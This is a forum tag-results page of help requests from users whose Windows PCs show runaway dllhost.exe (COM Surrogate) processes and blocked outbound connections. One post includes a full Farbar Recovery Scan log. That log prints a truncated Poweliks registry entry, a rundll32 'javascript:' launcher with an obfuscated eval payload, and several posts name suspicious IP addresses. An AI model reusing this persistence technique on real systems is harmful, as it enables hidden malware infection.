Showing results for tags 'dllhost.exe'.

  1. Hi, Recently I noticed multiple dllhost.exe COM surrogate files running in the taskbar that slowed my comp down dramatically (CPU Usage sometimes at >90%) and which could not be closed. I downloaded Malwarebytes which started blocking a sysWOW64\dllhost.exe process which alleviated some of the CPU usage, but was concerned when it showed a Trojan after running the scan. I'm seeking assistance with the best course of action with this as well as getting those unnecessary dllhost.exe files closed for good. This issue seems to be similar to one experienced by user F127 if that helps. I attached the log of the scan, and opted to ignore the Trojan for now since I wasn't sure if I should wait to quarantine after receiving instruction from one of you. Your assistance would be extremely appreciated! Scan.txt
  2. Hi, Newbie here to anti-virus and malware that won't go away/doesn't have an update or scan that removes it. I have used a Windows PC for about 15 years now and have had occasional issues but been able to solve them using postings that have been from reliable sources. Yesterday I started getting CPU Usage Pop Ups (I use Norton for anti-virus; it came with the laptop otherwise would probably use Avast; laptop is an HP Pro Book 6406b; 32 bit; Windows 7 Professional; Intel i5-2520M; 2.50 GHz - sorry for all the data but not sure what you will need). The pop ups indicate high memory usage by COM Surrogate; another pop up said it was high memory usage by Internet Explorer; another said dllhost.exe; and another high processes for windows services. I have also been getting pop ups asking me if I want to debug whatever web page I am on (I have always answered No). (The CPU usage box requires no action when it pops up, just needs to be closed, it's a Norton prompt.) I have also gotten a Norton message today that it blocked a Trojan attempt on three or four occasions from 195.2.240.80. I don't know what that site is - Norton labeled the attempts "high" and indicates it blocked them. Norton also says it blocked an effort from 192.168.1.1 but labeled that "info" - this one happened about 15 times today according to Norton's history log. I have run Norton Full System Scan (takes an hour) and it found 16 "low risk" (per Norton) cookies however I always dump my explorer history before I run the scan and did so this time too, which means the cookies should have all been gone but were not this time. 15 minutes after the full scan ended, I ran it again, having had limited (if any) internet usage and it found another 14, also seen as "low risk" by Norton. Whatever this is seems to replicate. In Googling this topic, the solutions seem unique to each user and more than one site said to use a malware forum and speak with an expert. So here I am.
However frustrating this is on my end, I want to say "thanks" in advance to whomever will be assisting me. I have a feeling this is not a "paying position" for you so I really appreciate the time you are taking to help. fyi; as I was typing just now, I just received a COM Surrogate pop up from Norton that it was using a ton of my memory. Thanks again. Mark
  3. I have a possible infection and would appreciate someone looking into this. My computer has very sluggish behavior and seems to take forever to do anything, even when nothing is running. I continually get error messages from Norton on high memory usage by Com Surrogates (Syswow 64) and I also have been getting notices from MalwareBytes on malicious websites being blocked (example attached.) I ran the Farbar recovery scan tool and found the following notation: ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64 I am attaching the complete files for reference. Does this mean I have a rootkit and if so, how do I remove it? Thanks much in advance for your help. FRST.txt Addition.txt
  4. Hello, Just last night, I noticed my computer slowing down. When I opened task manager, I noticed my computer had a large amount of processes, mainly consisting of dllhost.exe processes that used up to 90% of my memory. I don't know what has caused this problem, but I do know this has occurred to several other people, including on this forum. Since then I have run a Malwarebytes threat scan, and the problem has become manageable, but not solved. I have already run Farbar Recovery Scan Tool. I have also attached FRST.txt and Addition.txt. Thanks for any help that comes my way. Addition.txt FRST.txt
  5. Working on a friends system which is infected. I installed MalwareBytes and ran several full scans. It found and cleaned up a number of things. However the realtime web protection is still popping up with multiple outgoing attempts. The process is: c:\windows\syswow64\dllhost.exe and the IP addresses include: 95.215.1.57 ; 31.184.192.90; 66.45.56.109 Here are the FarBar results, I will attach as files as well; I will leave the system alone for now. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014 Ran by jalockma (administrator) on ACERLAPTOP on 17-10-2014 11:20:24 Running from C:\Users\jalockma\Desktop\Jbrown Recovery Loaded Profile: jalockma (Available profiles: jalockma) Platform: Windows 8 (X64) OS Language: English (United States) Internet Explorer Version 10 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (APN LLC.) C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe (Qualcomm Atheros Commnucations) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe (Microsoft Corporation) C:\Windows\System32\dasHost.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe (Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (McAfee, Inc.) 
C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe (McAfee, Inc.) C:\Windows\System32\mfevtps.exe (NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe (Dritek System INC.) C:\Windows\RfBtnSvc64.exe (McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe (McAfee, Inc.) C:\Program Files\Common Files\mcafee\AMCore\mcshield.exe (McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe (McAfee, Inc.) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe (Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe (Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe (McAfee, Inc.) C:\Program Files\mcafee\msm\McSmtFwk.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMutilps32.exe (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe (McAfee, Inc.) C:\Program Files\Common Files\mcafee\Platform\McUICnt.exe (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe\LiveComm.exe (Dritek System Inc.) 
C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe (Intel Corporation) C:\Windows\System32\igfxext.exe (Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe (Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe (CyberLink) C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe () C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe () C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Egis Technology Inc.) C:\Program Files\EgisTec IPS\PmmUpdate.exe (Egis Technology Inc.) C:\Program Files\EgisTec IPS\EgisUpdate.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (McAfee, Inc.) C:\Program Files\mcafee\virusscan\McVsShld.exe (McAfee, Inc.) C:\Program Files\Common Files\mcafee\Platform\Core\mchost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2873744 2012-11-20] (ELAN Microelectronics Corp.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12937872 2012-07-27] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1214608 2012-07-10] (Realtek Semiconductor) HKLM\...\Run: [btPreLoad] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtPreLoad.exe [64640 2013-01-28] () HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [537992 2014-04-25] (McAfee, Inc.) HKLM-x32\...\Run: [LManager] => [X] HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508656 2012-07-25] (Dolby Laboratories Inc.) 
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [2994880 2012-08-15] (Symantec Corporation) HKLM-x32\...\Run: [bCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-05-11] (Adobe Systems Incorporated) HKLM-x32\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [537992 2014-04-25] (McAfee, Inc.) HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation) HKLM-x32\...\Run: [ApnTBMon] => C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe [1942424 2014-09-22] (APN) HKLM-x32\...\Run: [LTCM Client] => C:\Program Files (x86)\LTCM Client\ltcmClient.exe [2756864 2011-04-07] (Leader Technologies Inc.) HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1058880 2013-03-28] (SEIKO EPSON CORPORATION) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKLM\...\Policies\Explorer\Run: [btvStack] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [132736 2013-01-28] ( (Qualcomm Atheros Commnucations)) HKLM\...\Policies\Explorer: [NoFolderOptions] 0 HKLM\...\Policies\Explorer: [NoControlPanel] 0 HKU\S-1-5-19\...\RunOnce: [isMyWinLockerReboot] => msiexec.exe /qn /x{voidguid} HKU\S-1-5-20\...\RunOnce: [isMyWinLockerReboot] => msiexec.exe /qn /x{voidguid} HKU\S-1-5-21-2604008792-1424924497-987845697-1001\...\Run: [spotify Web Helper] => C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe [1193176 2013-01-26] () HKU\S-1-5-21-2604008792-1424924497-987845697-1001\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_IATILBE.EXE [297024 2013-01-24] (SEIKO EPSON CORPORATION) 
HKU\S-1-5-21-2604008792-1424924497-987845697-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! HKU\S-1-5-18\...\RunOnce: [isMyWinLockerReboot] => msiexec.exe /qn /x{voidguid} Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.130\SSScheduler.exe (McAfee, Inc.) Startup: C:\Users\jalockma\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/ HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://acer13.msn.com HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.) URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.) 
SearchScopes: HKLM - DefaultScope {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS SearchScopes: HKLM - {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS SearchScopes: HKLM-x32 - DefaultScope {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS SearchScopes: HKLM-x32 - {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MAARJS SearchScopes: HKCU - DefaultScope {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = SearchScopes: HKCU - {27B34BBB-E4E0-4349-8F67-C6821D16BFBB} URL = BHO: Ask Toolbar -> {4F524A2D-5637-006A-76A7-7A786E7484D7} -> C:\Program Files (x86)\AskPartnerNetwork\Toolbar\ORJ-V7\Passport_x64.dll (APN LLC.) BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\IEPlugIn.dll (Qualcomm Atheros Commnucations) BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll (McAfee, Inc.) BHO-x32: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll (SEIKO EPSON CORPORATION) BHO-x32: Ask Toolbar -> {4F524A2D-5637-006A-76A7-7A786E7484D7} -> C:\Program Files (x86)\AskPartnerNetwork\Toolbar\ORJ-V7\Passport.dll (APN LLC.) 
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation) BHO-x32: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.) Toolbar: HKLM - Ask Toolbar - {4F524A2D-5637-006A-76A7-7A786E7484D7} - C:\Program Files (x86)\AskPartnerNetwork\Toolbar\ORJ-V7\Passport_x64.dll (APN LLC.) Toolbar: HKLM-x32 - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.) Toolbar: HKLM-x32 - Ask Toolbar - {4F524A2D-5637-006A-76A7-7A786E7484D7} - C:\Program Files (x86)\AskPartnerNetwork\Toolbar\ORJ-V7\Passport.dll (APN LLC.) Toolbar: HKLM-x32 - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll (SEIKO EPSON CORPORATION) Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.) Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.) Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.) 
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.) Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll (McAfee, Inc.) Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll (McAfee, Inc.) FireFox: ======== FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1205146.dll (Adobe Systems, Inc.) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin-x32: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.130\npMcAfeeMss.dll (McAfee, Inc.) 
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL () FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll No File FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor FF Extension: McAfee SiteAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor [2012-12-20] FF HKLM-x32\...\Firefox\Extensions: [e-webprint@epson.com] - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on FF Extension: E-Web Print - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on [2014-04-30] FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2012-12-20] Chrome: ======= CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2014-10-11] CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2014-10-11] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 APNMCP; C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe [166296 2014-09-22] (APN LLC.) 
R2 AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [227456 2013-01-28] (Qualcomm Atheros Commnucations) R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2449552 2012-10-26] (Acer Incorporated) S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [469648 2012-11-16] (Acer Incorporated) R3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658064 2012-10-23] (Acer Incorporated) S3 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation) R2 ETDService; C:\Program Files\Elantech\ETDService.exe [100752 2012-11-20] (ELAN Microelectronics Corp.) R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation) S3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation) R2 McAfee SiteAdvisor Service; C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe [201304 2012-08-31] (McAfee, Inc.) R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [178528 2014-04-25] (McAfee, Inc.) S3 McAWFwk; c:\Program Files\mcafee\msc\McAWFwk.exe [332080 2012-01-26] (McAfee, Inc.) S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.130\McCHSvc.exe [288776 2013-09-06] (McAfee, Inc.) R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) R2 McNaiAnn; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) 
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [603424 2014-06-12] (McAfee, Inc.) S4 McOobeSv; C:\Program Files\Common Files\mcafee\McSvcHost\McSvHost.exe [201304 2012-08-31] (McAfee, Inc.) R2 mcpltsvc; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) R2 McProxy; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [1041192 2014-07-24] (McAfee, Inc.) R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [219752 2014-06-20] (McAfee, Inc.) R2 mfevtp; C:\windows\system32\mfevtps.exe [189912 2014-06-20] (McAfee, Inc.) R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.) S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation) S3 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [3943104 2012-08-15] (Symantec Corporation) R2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation) R2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2013-01-26] (Dritek System INC.) S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16048 2013-07-01] (Microsoft Corporation) S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) 
S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-01-28] (Qualcomm Atheros) S3 BthLEEnum; C:\Windows\system32\DRIVERS\BthLEEnum.sys [202752 2012-07-25] (Microsoft Corporation) R1 ccSet_NARA; C:\Windows\system32\drivers\NARAx64\0401000.00E\ccSetx64.sys [168608 2012-05-25] (Symantec Corporation) R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [72128 2014-06-20] (McAfee, Inc.) S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197704 2013-09-23] (McAfee, Inc.) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-17] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-10-01] (Malwarebytes Corporation) R3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [181704 2014-06-20] (McAfee, Inc.) R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [313544 2014-06-20] (McAfee, Inc.) S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [70600 2014-06-20] (McAfee, Inc.) R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [523792 2014-06-20] (McAfee, Inc.) R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [786296 2014-06-20] (McAfee, Inc.) R3 mfencbdc; C:\Windows\system32\DRIVERS\mfencbdc.sys [444720 2014-07-24] (McAfee, Inc.) S3 mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys [96592 2014-07-24] (McAfee, Inc.) R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [348552 2014-06-20] (McAfee, Inc.) R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2013-01-26] (Dritek System Inc.) ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 
2014-10-17 11:20 - 2014-10-17 11:20 - 00000000 ____D () C:\FRST
2014-10-17 11:19 - 2014-10-17 11:20 - 00000000 ____D () C:\Users\jalockma\Desktop\Jbrown Recovery
2014-10-17 07:58 - 2014-10-17 07:59 - 00002186 _____ () C:\Users\jalockma\Desktop\Rkill.txt
2014-10-17 07:56 - 2014-10-17 07:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2014-10-17 07:55 - 2014-10-17 07:59 - 00000000 ____D () C:\temp
2014-10-16 14:54 - 2014-10-17 08:01 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-16 14:54 - 2014-10-16 14:54 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-16 14:54 - 2014-10-16 14:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-16 14:53 - 2014-10-16 14:54 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-16 14:53 - 2014-10-16 14:53 - 00000000 ____D () C:\ProgramData\Malwarebytes
